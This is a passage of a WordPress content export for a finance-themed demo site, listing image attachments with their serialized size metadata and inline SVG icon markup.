		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g id="XMLID_2590_"><g id="XMLID_212_"><path id="XMLID_215_" d="m460.459 441.32-86.206-149.314c31.891-30.919 51.747-74.184 51.747-122.006 0-93.738-76.261-170-170-170s-170 76.262-170 170c0 47.822 19.856 91.087 51.748 122.007l-86.207 149.313c-2.023 3.505-1.735 7.884.731 11.093 2.465 3.208 6.622 4.614 10.531 3.563l66.454-17.904 17.722 66.503c1.042 3.911 4.338 6.808 8.351 7.339.44.058.879.087 1.315.087 3.538 0 6.855-1.88 8.657-5l90.698-157.095 90.698 157.094c1.802 3.121 5.12 5 8.657 5 .436 0 .875-.029 1.315-.087 4.012-.531 7.309-3.428 8.351-7.339l17.722-66.503 66.455 17.904c3.91 1.054 8.065-.354 10.531-3.563 2.466-3.208 2.754-7.587.73-11.092zm-354.459-271.32c0-82.71 67.29-150 150-150s150 67.29 150 150-67.29 150-150 150-150-67.29-150-150zm54.076 306.052-14.075-52.819c-.684-2.567-2.362-4.757-4.663-6.085-2.301-1.329-5.035-1.687-7.602-.996l-52.78 14.22 72.221-125.089c24.355 18.556 53.844 30.7 85.933 33.88zm218.188-59.901c-2.567-.691-5.301-.333-7.602.996s-3.979 3.518-4.663 6.085l-14.075 52.819-79.034-136.89c32.089-3.18 61.578-15.324 85.933-33.88l72.22 125.09z"></path><path id="XMLID_885_" d="m193.352 149.609c-2.131 6.565-.384 13.635 4.56 18.451l15.992 15.581-3.769 22.006c-1.165 6.803 1.581 13.548 7.166 17.604 3.155 2.291 6.844 3.454 10.559 3.454 2.862 0 5.739-.691 8.397-2.089l19.759-10.395 19.765 10.384c6.11 3.21 13.374 2.684 18.956-1.375 5.583-4.058 8.325-10.805 7.156-17.607l-3.78-22.005 15.984-15.589c4.941-4.819 6.684-11.89 4.55-18.453-2.135-6.563-7.704-11.256-14.534-12.247l-22.096-3.205-9.886-20.019c-3.056-6.188-9.239-10.03-16.139-10.03-.001 0-.003 0-.005 0-6.901.002-13.085 3.848-16.139 10.038l-9.875 20.024-22.094 3.217c-6.829.996-12.396 5.691-14.527 12.255zm44.706 3.563c3.257-.474 6.072-2.521 7.528-5.472l10.408-21.104 10.42 21.099c1.458 2.951 4.274 4.996 7.531 5.468l23.289 3.378-16.846 16.43c-2.356 2.298-3.431 5.608-2.874 8.852l3.984 23.192-20.832-10.945c-2.913-1.531-6.394-1.53-9.307.002l-20.826 10.956 3.972-23.194c.556-3.244-.521-6.554-2.878-8.851l-16.855-16.421z"></path><path id="XMLID_887_" d="m256 296c69.477 0 126-56.523 126-126 0-51.209-30.58-96.935-77.906-116.493-5.108-2.112-10.953.318-13.061 5.422-2.109 5.104.318 10.952 5.422 13.061 39.817 16.455 65.545 54.927 65.545 98.01 0 58.449-47.551 106-106 106s-106-47.551-106-106c0-43.186 25.812-81.692 65.759-98.098 5.109-2.098 7.55-7.941 5.452-13.049-2.099-5.109-7.94-7.549-13.049-5.452-47.482 19.501-78.162 65.268-78.162 116.599 0 69.477 56.524 126 126 126z"></path><path id="XMLID_888_" d="m256.13 64c2.63 0 5.21-1.07 7.07-2.93s2.93-4.44 2.93-7.07-1.07-5.21-2.93-7.07-4.44-2.93-7.07-2.93-5.21 1.07-7.07 2.93c-1.87 1.86-2.93 4.44-2.93 7.07s1.06 5.21 2.93 7.07c1.86 1.86 4.44 2.93 7.07 2.93z"></path></g></g></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>woocommerce-placeholder</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/woocommerce-placeholder/</link>
		<pubDate>Thu, 01 Oct 2020 10:10:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/woocommerce-placeholder.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1163</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:10:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:10:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[woocommerce-placeholder]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/woocommerce-placeholder.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/woocommerce-placeholder.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1200;s:6:"height";i:1200;s:4:"file";s:37:"2020/10/woocommerce-placeholder.png";s:5:"sizes";a:7:{s:6:"medium";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-300x300.png";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:5:"large";a:4:{s:4:"file";s:39:"woocommerce-placeholder-1-1024x1024.png";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:12:"medium_large";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-768x768.png";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-600x400.png";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:37:"woocommerce-placeholder-1-600x600.png";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:38:"woocommerce-placeholder-1-1200x600.png";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-shop</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/pheader-shop/</link>
		<pubDate>Thu, 01 Oct 2020 10:58:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1207</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:58:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:58:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-shop]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/pheader-shop.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:26:"2020/10/pheader-shop.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"pheader-shop-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"pheader-shop-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"pheader-shop-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"pheader-shop-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"pheader-shop-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-shop-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"pheader-shop-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"pheader-shop-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"pheader-shop-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/project1/</link>
		<pubDate>Fri, 02 Oct 2020 09:09:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1218</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:09:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:09:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>773</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1420;s:4:"file";s:22:"2020/09/project1.jpg";s:5:"sizes";a:8:{s:6:"medium";a:4:{s:4:"file";s:22:"project1-1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"project1-1-1024x1024.jpg";s:5:"width";i:1024;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"project1-1-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project1-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"project1-1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/project2/</link>
		<pubDate>Fri, 02 Oct 2020 09:10:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1220</wp:post_id>
		<wp:post_date><![CDATA[2020-10-02 09:10:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-02 09:10:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1420;s:6:"height";i:1630;s:4:"file";s:22:"2020/09/project2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"project2-1-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"project2-1-892x1024.jpg";s:5:"width";i:892;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:22:"project2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"project2-1-768x882.jpg";s:5:"width";i:768;s:6:"height";i:882;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"project2-1-1338x1536.jpg";s:5:"width";i:1338;s:6:"height";i:1536;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:22:"project2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:22:"project2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"project2-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"project2-1-1200x1200.jpg";s:5:"width";i:1200;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>target</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/target/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/target.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1247</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[target]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/target.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/target.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M136.53,207.562c0.446,0.08,0.89,0.118,1.327,0.118c3.564,0,6.726-2.552,7.375-6.183   c6.598-36.951,26.111-70.729,54.946-95.113c29.17-24.667,66.308-38.252,104.571-38.252c40.815,0,79.809,15.224,109.798,42.867   c3.044,2.808,7.791,2.614,10.598-0.432s2.614-7.79-0.432-10.598c-32.767-30.204-75.372-46.838-119.964-46.838   c-41.804,0-82.381,14.844-114.257,41.798c-31.498,26.635-52.816,63.545-60.027,103.93   C129.737,202.938,132.452,206.834,136.53,207.562z"></path>
	<path d="M395.017,329.524c1.897,0,3.797-0.716,5.257-2.151c26.279-25.831,40.752-60.348,40.752-97.193   c0-75.144-61.134-136.278-136.278-136.278c-30.819,0-61.021,10.578-85.044,29.787c-23.652,18.912-40.526,45.458-47.516,74.75   c-0.961,4.029,1.526,8.075,5.555,9.036c4.032,0.962,8.075-1.525,9.036-5.555c6.218-26.059,21.238-49.681,42.293-66.517   c21.683-17.338,47.852-26.502,75.676-26.502c66.873,0,121.278,54.405,121.278,121.278c0,32.789-12.88,63.507-36.267,86.496   c-2.954,2.903-2.995,7.652-0.091,10.606C391.137,328.775,393.076,329.524,395.017,329.524z"></path>
	<path d="M367.008,334.279c-18.747,11.238-40.276,17.178-62.26,17.178c-33.428,0-64.563-13.311-87.672-37.481   c-2.862-2.994-7.609-3.101-10.604-0.238c-2.994,2.862-3.101,7.61-0.238,10.604c25.965,27.158,60.952,42.115,98.514,42.115   c24.7,0,48.896-6.678,69.972-19.313c3.553-2.129,4.707-6.736,2.577-10.289C375.168,333.303,370.561,332.148,367.008,334.279z"></path>
	<path d="M304.748,139.704c-18.697,0-36.643,5.656-51.899,16.357c-14.907,10.456-26.202,24.94-32.665,41.888   c-1.476,3.87,0.465,8.204,4.335,9.68c3.87,1.478,8.205-0.465,9.68-4.335c11.083-29.063,39.434-48.59,70.548-48.59   c41.617,0,75.476,33.858,75.476,75.475s-33.858,75.476-75.476,75.476c-15.522,0-30.43-4.673-43.111-13.515   c-12.404-8.648-21.838-20.637-27.283-34.672c-1.498-3.861-5.843-5.777-9.705-4.279c-3.861,1.498-5.777,5.843-4.279,9.705   c6.527,16.823,17.83,31.191,32.688,41.55c15.21,10.605,33.084,16.211,51.69,16.211c49.888,0,90.476-40.587,90.476-90.476   S354.637,139.704,304.748,139.704z"></path>
	<path d="M120.319,294.523c-3.664-1.934-8.201-0.528-10.132,3.136c-10.091,19.14-23.911,45.353-5.271,71.411   c1.427,1.995,3.713,3.137,6.1,3.137c0.549,0,1.104-0.061,1.655-0.186c2.943-0.666,5.201-3.031,5.729-6.002   c1.514-8.514,8.798-18.489,22.206-30.367c9.176,13.464,21.644,24.868,38.622,35.423c3.039,1.889,6.986,1.369,9.432-1.241   c2.446-2.609,2.709-6.583,0.628-9.492c-13.336-18.643-3.311-37.522,8.297-59.383c10.34-19.473,21.84-41.151,13.625-63.282h51.721   c3.553,19.865,20.946,34.995,41.817,34.995c23.431,0,42.494-19.063,42.494-42.494s-19.063-42.494-42.494-42.494   c-20.87,0-38.262,15.128-41.817,34.992H113.867L79.721,197.25c-1.294-0.964-2.865-1.485-4.479-1.485H7.5   c-3.057,0-5.809,1.856-6.954,4.69c-1.145,2.835-0.455,6.081,1.744,8.205c5.898,5.696,9.147,13.338,9.147,21.52   c0,8.182-3.249,15.824-9.146,21.519c-2.2,2.124-2.89,5.37-1.745,8.205c1.146,2.835,3.896,4.691,6.954,4.691h67.741   c1.614,0,3.185-0.521,4.479-1.485l34.151-25.431h8.604c5.668,9.724,5.769,20.11,0.451,33.965c-1.484,3.867,0.447,8.206,4.314,9.69   c3.865,1.483,8.205-0.448,9.689-4.314c3.859-10.053,7.708-24.167,2.098-39.34h55.631c10.182,17.631,0.635,35.61-10.322,56.246   c-8.297,15.625-17.349,32.67-16.356,50.23c-7.978-7.166-14.203-14.884-19.047-23.522c-1.084-1.932-2.966-3.286-5.143-3.7   c-2.177-0.41-4.424,0.158-6.141,1.558c-12.267,10.01-20.948,18.887-26.546,27.296c-1.776-12.667,4.358-25.971,12.352-41.133   C125.388,300.991,123.983,296.455,120.319,294.523z M304.748,202.686c15.16,0,27.494,12.333,27.494,27.494   s-12.333,27.494-27.494,27.494c-12.56,0-23.172-8.469-26.445-19.995h26.447c4.142,0,7.5-3.358,7.5-7.5s-3.358-7.5-7.5-7.5h-26.446   C281.578,211.154,292.189,202.686,304.748,202.686z M72.755,249.594H22.053c2.871-5.976,4.384-12.568,4.384-19.415   c0-6.846-1.513-13.439-4.384-19.415h50.702l26.071,19.415L72.755,249.594z"></path>
	<path d="M504.5,443.863h-53.2l-41.456-71.217c45.173-33.355,71.947-86.089,71.947-142.469c0-38.807-12.322-75.65-35.633-106.547   c-2.494-3.306-7.197-3.964-10.504-1.47c-3.307,2.495-3.965,7.198-1.47,10.504c21.332,28.273,32.607,61.993,32.607,97.513   c0,53.746-26.574,103.887-71.089,134.129c-10.63,7.233-22.116,13.165-34.149,17.671c-0.38,0.142-0.756,0.297-1.138,0.436   c0,0-0.001,0-0.001,0c-0.001,0-0.001,0-0.002,0.001c-17.781,6.511-36.508,9.813-55.661,9.813c-19.126,0-37.855-3.302-55.664-9.813   c-12.421-4.543-24.298-10.64-35.328-18.138c-2.229-1.501-4.558-3.174-7.117-5.114c-3.301-2.504-8.004-1.856-10.507,1.444   s-1.856,8.005,1.444,10.508c0.7,0.531,1.385,1.044,2.058,1.541l-41.446,71.208h-53.194c-4.142,0-7.5,3.358-7.5,7.5   s3.358,7.5,7.5,7.5h57.43c0.025,0,0.049,0.005,0.073,0.005h54.31c0.023,0,0.045-0.005,0.068-0.005h175.733   c0.023,0,0.045,0.005,0.068,0.005h54.31c0.025,0,0.049-0.005,0.073-0.005H504.5c4.142,0,7.5-3.358,7.5-7.5   S508.642,443.863,504.5,443.863z M397.399,443.863l-24.158-50.375c0.631-0.265,1.257-0.541,1.885-0.813   c0.259-0.112,0.519-0.222,0.777-0.335c1.445-0.635,2.881-1.292,4.309-1.965c0.3-0.141,0.598-0.285,0.897-0.429   c1.42-0.68,2.833-1.373,4.235-2.091c0.049-0.025,0.098-0.049,0.147-0.074c1.435-0.737,2.856-1.499,4.271-2.275   c0.302-0.165,0.603-0.331,0.904-0.498c1.384-0.77,2.759-1.555,4.121-2.361c0.206-0.122,0.411-0.248,0.617-0.371   c0.665-0.398,1.331-0.793,1.991-1.2l36.55,62.787H397.399z M359.112,398.716l21.651,45.147H228.729l21.659-45.15   c17.515,5.648,35.768,8.515,54.362,8.515C323.367,407.228,341.62,404.361,359.112,398.716z M212.108,381.047   c7.734,4.76,15.815,8.915,24.16,12.421l-24.175,50.395h-36.546L212.108,381.047z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>profit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/home/profit/</link>
		<pubDate>Mon, 05 Oct 2020 07:57:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/profit.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1248</wp:post_id>
		<wp:post_date><![CDATA[2020-10-05 07:57:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-05 07:57:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[profit]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/profit.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/profit.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M54.754,149.62h87.326l-29.633,43.741c-2.323,3.429-1.426,8.092,2.003,10.415c3.43,2.322,8.093,1.427,10.416-2.003   l35.332-52.153h48.731l81.4,120.155c1.45,2.14,3.812,3.294,6.216,3.294c1.448,0,2.911-0.419,4.2-1.292   c3.429-2.323,4.326-6.986,2.003-10.415l-80.751-119.196l48.252-69.697c6.55-9.462,7.301-21.671,1.96-31.864   S256.402,24.08,244.895,24.08H124.232c-11.508,0-21.974,6.332-27.315,16.525s-4.59,22.402,1.96,31.865l31.663,45.734L66.664,80.396   c-3.565-2.109-8.164-0.93-10.274,2.634c-2.11,3.564-0.931,8.165,2.634,10.274l69.801,41.315h-74.07c-4.142,0-7.5,3.357-7.5,7.5   S50.612,149.62,54.754,149.62z M110.204,47.567c2.785-5.314,8.029-8.487,14.028-8.487h120.662c6,0,11.244,3.173,14.028,8.487   